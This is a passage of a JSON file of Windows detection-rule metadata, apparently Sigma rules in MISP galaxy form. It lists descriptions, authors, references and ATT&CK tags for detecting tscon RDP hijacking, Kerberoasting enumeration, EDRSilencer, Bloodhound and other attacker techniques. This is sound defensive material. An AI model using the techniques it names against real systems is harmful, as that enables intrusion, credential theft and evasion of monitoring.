"https://www.hackingarticles.in/rdp-session-hijacking-with-tscon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_rdp_redirect.yml" ], "tags": [ "attack.lateral-movement", "attack.t1563.002", "attack.t1021.001", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "value": "Suspicious RDP Redirect Using TSCON" }, { "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_redirect_local_admin_share.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", "value": "Suspicious Redirection to Local Admin Share" }, { "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", "meta": { "author": "@ROxPinTeddy", "creation_date": "2020-05-12", "falsepositive": [ "Legitimate use of Winrar command line version", "Other command line tools, that use these flags" ], "filename": "proc_creation_win_rar_compression_with_password.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/bash/rar.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", "value": "Rar Usage with Password and Compression Level" }, { "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly." ], "filename": "proc_creation_win_powershell_add_windows_capability.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content", "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml" ], "tags": [ "attack.execution" ] }, "uuid": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "value": "Add Windows Capability Via PowerShell Cmdlet" }, { "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-11-24", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", "value": "Suspicious Certreq Command to Download" }, { "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", "meta": { "author": "Markus Neis, keepwatch", "creation_date": "2018-11-14", "falsepositive": [ "Administration activity" ], "filename": "proc_creation_win_setspn_spn_enumeration.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019", "https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_setspn_spn_enumeration.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", "value": "Potential SPN Enumeration Via Setspn.EXE" }, { "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/blackbyte-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", "value": "Suspicious Windows Update Agent Empty Cmdline" }, { "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-14", "falsepositive": [ "Rare legitimate installation of kernel drivers via sc.exe" ], "filename": "proc_creation_win_sc_new_kernel_driver.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_new_kernel_driver.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49", "value": "New Kernel Driver Via SC.EXE" }, { "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", "meta": { "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "creation_date": "2020-10-08", "falsepositive": [ "Administrators or Power users may remove their shares via cmd line" ], "filename": "proc_creation_win_net_share_unmount.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_share_unmount.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.005" ] }, "related": [ { "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", "value": "Unmount Share Via Net.EXE" }, { "description": "Detects use of chcp to look up the system locale value as part of host discovery", "meta": { "author": "_pete_0, TheDFIRReport", "creation_date": "2022-02-21", "falsepositive": [ "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.", "Discord was seen using chcp to look up code pages" ], "filename": "proc_creation_win_chcp_codepage_lookup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml" ], "tags": [ "attack.discovery", "attack.t1614.001" ] }, "related": [ { "dest-uuid": "c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7090adee-82e2-4269-bd59-80691e7c6338", "value": "Console CodePage Lookup Via CHCP" }, { "description": "Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.\n", "meta": { "author": "@gott_cyber", "creation_date": "2024-01-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_edrsilencer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/netero1010/EDRSilencer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_edrsilencer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eb2d07d4-49cb-4523-801a-da002df36602", "value": "HackTool - EDRSilencer Execution" }, { "description": "Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.\nThis behavior has been observed in-the-wild by different threat actors.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-05", "falsepositive": [ "Administrators building packages using iexpress.exe" ], "filename": "proc_creation_win_iexpress_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html", "https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior", "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/", "https://en.wikipedia.org/wiki/IExpress", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iexpress_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2b048b0-7857-4380-b0fb-d3f0ab820b71", "value": "Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location" }, { "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", "meta": { "author": "Sander Wiebing", "creation_date": "2020-05-23", "falsepositive": [ "Legitimate administration activity" ], "filename": "proc_creation_win_netsh_fw_allow_rdp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", "value": "RDP Connection Allowed Via Netsh.EXE" }, { "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", "meta": { "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-04-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hh_html_help_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.initial-access", "attack.t1047", "attack.t1059.001", "attack.t1059.003", "attack.t1059.005", "attack.t1059.007", "attack.t1218", "attack.t1218.001", "attack.t1218.010", "attack.t1218.011", "attack.t1566", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "value": "HTML Help HH.EXE Suspicious Child Process" }, { "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-10", "falsepositive": [ "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "435e10e4-992a-4281-96f3-38b11106adde", "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet" }, { "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", "meta": { "author": "Michael Haag", "creation_date": "2019-01-16", "falsepositive": [ "Printer software / driver installations", "HP software" ], "filename": "proc_creation_win_mshta_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trustedsec.com/july-2015/malicious-htas/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_child_processes.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.005", "car.2013-02-003", "car.2013-03-001", "car.2014-04-003" ] }, "related": [ { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "03cc0c25-389f-4bf8-b48d-11878079f1ca", "value": "Suspicious MSHTA Child Process" }, { "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", "meta": { "author": "@gott_cyber", "creation_date": "2022-08-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mobile.twitter.com/0gtweet/status/1564131230941122561", "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", "value": "Potential DLL Sideloading Via DeviceEnroller.EXE" }, { "description": "Detects the installation of VsCode tunnel (code-tunnel) as a service.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate installation of code-tunnel as a service" ], "filename": "proc_creation_win_vscode_tunnel_service_install.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://code.visualstudio.com/docs/remote/tunnels", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_service_install.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30bf1789-379d-4fdc-900f-55cd0a90a801", "value": "Visual Studio Code Tunnel Service Installation" }, { "description": "Detects the execution of a renamed \"PingCastle\" binary based on the PE metadata fields.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2024-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_pingcastle.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.pingcastle.com/documentation/scanner/", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pingcastle.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2433a154-bb3d-42e4-86c3-a26bdac91c45", "value": "Renamed PingCastle Binary Execution" }, { "description": "Attackers may leverage fsutil to enumerated connected drives.", "meta": { "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "creation_date": "2022-03-29", "falsepositive": [ "Certain software or administrative tasks may trigger false positives." ], "filename": "proc_creation_win_fsutil_drive_enumeration.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", "Turla has used fsutil fsinfo drives to list connected drives.", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" ], "tags": [ "attack.discovery", "attack.t1120" ] }, "related": [ { "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", "value": "Fsutil Drive Enumeration" }, { "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-20", "falsepositive": [ "Other programs that use these command line option and accepts an 'All' parameter" ], "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/BloodHoundAD/BloodHound", "https://github.com/BloodHoundAD/SharpHound", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml" ], "tags": [ "attack.discovery", "attack.t1087.001", "attack.t1087.002", "attack.t1482", "attack.t1069.001", "attack.t1069.002", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "value": "HackTool - Bloodhound/Sharphound Execution" }, { "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-18", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_pua_seatbelt.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/Seatbelt", "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" ], "tags": [ "attack.discovery", "attack.t1526", "attack.t1087", "attack.t1083" ] }, "related": [ { "dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", "value": "PUA - Seatbelt Execution" }, { "description": "Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.", "meta": { "author": "Beyu Denis, oscd.community", "creation_date": "2019-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_psr_capture_screenshots.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf", "https://lolbas-project.github.io/lolbas/Binaries/Psr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", "value": "Screen Capture Activity Via Psr.EXE" }, { "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_net_use_network_connections_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_network_connections_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1049" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", "value": "System Network Connections Discovery Via Net.EXE" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate usage of the tool" ], "filename": "proc_creation_win_remote_access_tools_screenconnect.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", "value": "Remote Access Tool - ScreenConnect Execution" }, { "description": "Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-03-13", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_taskmgr_susp_child_process.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ReneFreingruber/status/1172244989335810049", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskmgr_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", "value": "New Process Created Via Taskmgr.EXE" }, { "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", "meta": { "author": "Sreeman", "creation_date": "2020-04-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hxtsr_masquerading.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hxtsr_masquerading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": 